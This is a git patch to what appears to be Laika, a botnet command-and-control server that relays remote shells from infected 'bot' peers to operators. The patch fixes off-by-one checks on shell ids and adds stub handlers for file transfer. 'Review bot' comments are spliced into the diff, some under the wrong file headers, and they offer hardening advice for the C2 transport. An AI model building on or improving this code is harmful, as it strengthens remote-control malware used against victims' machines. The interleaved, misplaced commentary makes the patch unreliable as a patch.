From 0fc8d0c1690860abaed95451c0bc988d1dc39e1c Mon Sep 17 00:00:00 2001
From: CPunch
Date: Mon, 13 Jun 2022 12:11:08 -0500
Subject: [PATCH] CNC: Fix possible out of bounds subscript for SHELL_* packets

- content events now pass the sLaika_peer struct
---
 cnc/include/cpeer.h | 7 +++++++
 cnc/src/cpanel.c | 6 +++---
 cnc/src/cpeer.c | 23 ++++++++++++++++++++---
 lib/include/lcontent.h | 7 ++++---
 lib/src/lcontent.c | 10 +++++++---
 5 files changed, 41 insertions(+), 12 deletions(-)

diff --git a/cnc/include/cpeer.h b/cnc/include/cpeer.h
index ee7ff74..5ca80f6 100644
--- a/cnc/include/cpeer.h
+++ b/cnc/include/cpeer.h
@@ -52,4 +52,11 @@ void laikaC_handlePing(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData);
 void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData);
 void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData);
 
+/* content stream has finished */
+void laikaC_contentRecvEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
+/* request to open a content stream */
+bool laikaC_contentNewEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
+/* error happened on a stream */
+void laikaC_contentErrEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err);
+
 #endif
\ No newline at end of file
diff --git a/cnc/src/cpanel.c b/cnc/src/cpanel.c
index e061654..e0fbf98 100644
--- a/cnc/src/cpanel.c
+++ b/cnc/src/cpanel.c
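Review bot: The three new prototypes say nothing about the callback contract, and the one that matters is the return value of `laikaC_contentNewEvent`: per the lcontent.c change in this same patch, returning false makes the library answer the peer with CONTENT_ERR_REJECTED and drop the stream, so the header should state it, e.g. `/* request to open a content stream; return false to reject it (peer receives CONTENT_ERR_REJECTED) */`. The declarations also introduce `bool`, `CONTENT_ERRCODE` and the two `sLaika_content*` struct types into cpeer.h; unless its include list (outside this hunk) already pulls in lcontent.h and stdbool.h, the header no longer compiles on its own. The `#endif` is still left without a trailing newline.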
@@ -41,7 +41,7 @@ void laikaC_sendRmvPeer(struct sLaika_peer *authPeer, struct sLaika_peer *peer)
     laikaS_endOutPacket(authPeer);
 }
 
-/* ============================================[[ Packet Handlers ]]============================================= */
+/* =========================================[[ [Auth] Packet Handlers ]]========================================= */
 
 void laikaC_handleAuthenticatedHandshake(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData) {
     struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData;
@@ -100,7 +100,7 @@ void laikaC_handleAuthenticatedShellClose(struct sLaika_peer *authPeer, LAIKAPKT
     laikaS_readInt(&authPeer->sock, &id, sizeof(uint32_t));
 
     /* ignore malformed packet */
-    if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
+    if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
         return;
 
     laikaC_closeShell(shell);
@@ -121,7 +121,7 @@ void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_
     sz -= sizeof(uint32_t);
 
     /* ignore malformed packet */
-    if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
+    if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
         return;
 
     peer = shell->bot;
diff --git a/cnc/src/cpeer.c b/cnc/src/cpeer.c
index 69f75af..cf36f98 100644
--- a/cnc/src/cpeer.c
+++ b/cnc/src/cpeer.c
@@ -116,7 +116,7 @@ void laikaC_closeShells(struct sLaika_peer *peer) {
     }
 }
 
-/* ============================================[[ Packet Handlers ]]============================================= */
+/* ========================================[[ [Peer] Packet Handlers ]]========================================== */
 
 void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
     struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData;
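Review bot: In the laikaC_handleAuthenticatedShellData hunk, the `return` on a bad shell id leaves the remaining `sz` bytes of the shell payload unread on `authPeer->sock`; whether the packet layer discards the unread tail of a variable packet is not visible here, but if it does not, the next packet header is parsed from the middle of this payload, so either drain the `sz` bytes before returning or have the dispatcher skip them on early return. Separately, `sz -= sizeof(uint32_t)` runs before any check that `sz >= sizeof(uint32_t)`; if LAIKAPKT_SIZE is unsigned and the dispatcher does not enforce a minimum length for this packet type, the subtraction wraps to a huge value that is then used for the read further down. A guard such as `if (sz < sizeof(uint32_t)) return;` at the top of the handler would close both doors. The function's body continues outside the hunk.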
@@ -126,7 +126,7 @@ void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
     laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
 
     /* ignore packet if shell isn't open */
-    if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
+    if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
         return;
 
     /* close shell */
@@ -146,7 +146,7 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
     laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
 
     /* ignore packet if shell isn't open */
-    if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
+    if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
         return;
 
     laikaS_read(&peer->sock, (void*)buf, sz-sizeof(uint32_t));
@@ -157,3 +157,20 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
     laikaS_write(&shell->auth->sock, buf, sz-sizeof(uint32_t));
     laikaS_endVarPacket(shell->auth);
 }
+
+/* ============================================[[ Content Handlers ]]============================================ */
+
+/* content stream has finished */
+void laikaC_contentRecvEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content) {
+
+}
+
+/* request to open a content stream */
+bool laikaC_contentNewEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content) {
+
+}
+
+/* error happened on a stream */
+void laikaC_contentErrEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err) {
+
+}
\ No newline at end of file
diff --git a/lib/include/lcontent.h b/lib/include/lcontent.h
index 5997707..9ed81fa 100644
--- a/lib/include/lcontent.h
+++ b/lib/include/lcontent.h
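Review bot: In the laikaC_handleShellData hunk, the read on its last line, `laikaS_read(&peer->sock, (void*)buf, sz-sizeof(uint32_t))`, is sized entirely by the bot-supplied packet length with no visible check against the capacity of `buf` (declared before the hunk); unless the dispatcher already caps `sz` at that capacity, this is the same class of bug the commit title fixes, moved from the shell table to the payload buffer. If `buf` is a local array, `if (sz - sizeof(uint32_t) > sizeof(buf)) return;` before the read is cheap insurance, and `if (sz < sizeof(uint32_t)) return;` before the subtraction keeps an unsigned `sz` from wrapping. The early `return` on a bad id also leaves the payload unread on the socket; whether the packet layer skips it is not visible here. The function begins before the hunk.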
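Review bot: `laikaC_contentNewEvent` is declared `bool` but its body contains no return statement, so the value a caller reads is indeterminate — and lcontent.c in this same patch does read it (`!context->onNew(peer, context, content)`) to decide whether an inbound content stream is accepted or answered with CONTENT_ERR_REJECTED. Until the CNC has a real policy the stub should fail closed: `return false;`. Whether these three stubs are actually registered through laikaF_setupEvents is not visible in this patch, but a `bool` function that falls off the end is already a `-Wreturn-type` warning and, under C11 6.9.1p12, undefined behaviour the moment the value is used. A one-line comment such as `/* TODO: accept policy not implemented; reject all inbound streams */` would keep the intent obvious to whoever wires it up.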
@@ -26,9 +26,9 @@ typedef uint8_t CONTENT_TYPE;
 typedef uint8_t CONTENT_ERRCODE;
 typedef uint16_t CONTENT_ID;
 
-typedef void (*contentRecvEvent)(struct sLaika_contentContext *context, struct sLaika_content *content);
-typedef bool (*contentNewEvent)(struct sLaika_contentContext *context, struct sLaika_content *content);
-typedef void (*contentErrorEvent)(struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err);
+typedef void (*contentRecvEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
+typedef bool (*contentNewEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
+typedef void (*contentErrorEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err);
 
 struct sLaika_content {
     struct sLaika_content *next;
@@ -53,6 +53,7 @@ void laikaF_cleanContext(struct sLaika_contentContext *context);
 void laikaF_setupEvents(struct sLaika_contentContext *context, contentRecvEvent onRecv, contentNewEvent onNew, contentErrorEvent onError);
 
+int laikaF_nextID(struct sLaika_peer *peer); /* returns the id that will be assigned to the next sent content */
 int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type);
 void laikaF_pollContent(struct sLaika_peer *peer);
 
diff --git a/lib/src/lcontent.c b/lib/src/lcontent.c
index ddbf19a..e7f6c22 100644
--- a/lib/src/lcontent.c
+++ b/lib/src/lcontent.c
@@ -110,6 +110,10 @@ struct sLaika_content* laikaF_newContent(struct sLaika_contentContext *context,
     return content;
 }
 
+int laikaF_nextID(struct sLaika_peer *peer) {
+    return peer->context.nextID + 1;
+}
+
 int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type) {
     struct sLaika_contentContext *context = &peer->context;
     struct sLaika_content *content = laikaF_newContent(context, fd, getSize(fd), context->nextID++, type, CONTENT_OUT);
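Review bot: `laikaF_nextID` returns `peer->context.nextID + 1`, but `laikaF_sendContent` directly below hands `context->nextID++` — a post-increment — to `laikaF_newContent`, so the next sent content actually receives `nextID`, not `nextID + 1`, and the prototype's comment in lcontent.h ("the id that will be assigned to the next sent content") is off by one. The fix is `return peer->context.nextID;`. Any caller that uses this value to tell the other side which stream to expect will be waiting on the wrong id. Note also that the wire type `CONTENT_ID` is `uint16_t` while this function returns `int`; if `nextID` is wider than 16 bits (its declaration is outside this patch) the value reported here and the id that goes on the wire diverge once the counter passes 65535, so returning `CONTENT_ID` or masking consistently in both places would keep them in step.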
@@ -180,7 +184,7 @@ void laikaF_handleContentNew(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
     contentType = laikaS_readByte(&peer->sock);
 
     content = laikaF_recvContent(peer, contentID, contentSize, contentType);
-    if (context->onNew && !context->onNew(context, content)) {
+    if (context->onNew && !context->onNew(peer, context, content)) {
         sendContentError(peer, contentID, CONTENT_ERR_REJECTED);
         rmvContent(context, content);
     }
@@ -200,7 +204,7 @@ void laikaF_handleContentError(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void
     LAIKA_DEBUG("We received an errcode for id %d, err: %d\n", contentID, errCode);
 
     if (context->onError) /* check if event exists! */
-        context->onError(peer, context, content, errCode);
+        context->onError(peer, context, content, errCode);
 
     rmvContent(context, content);
 }
@@ -226,6 +230,6 @@ void laikaF_handleContentChunk(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void
         rmvContent(context, content);
     } else if ((content->processed += bodySz) == content->sz) {
         if (context->onReceived) /* check if event exists! */
-            context->onReceived(context, content);
+            context->onReceived(peer, context, content);
     }
 }
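Review bot: In the laikaF_handleContentNew hunk, the condition `context->onNew && !context->onNew(peer, context, content)` means a peer with no `onNew` handler installed accepts every inbound content stream unconditionally, after `laikaF_recvContent` has already set up state for a remotely chosen `contentSize`. For a C2 transport where any connected peer can send CONTENT_NEW, fail-closed is the safer default: `if (!context->onNew || !context->onNew(peer, context, content))`, so a peer type that never registered a policy rejects transfers instead of buffering them; any code path that intentionally relies on default-accept (not visible here) should register an explicit always-true handler instead. The result of `laikaF_recvContent` is also passed to the callback and to `rmvContent` without a NULL check; whether it can return NULL is outside this hunk. The function begins before the hunk.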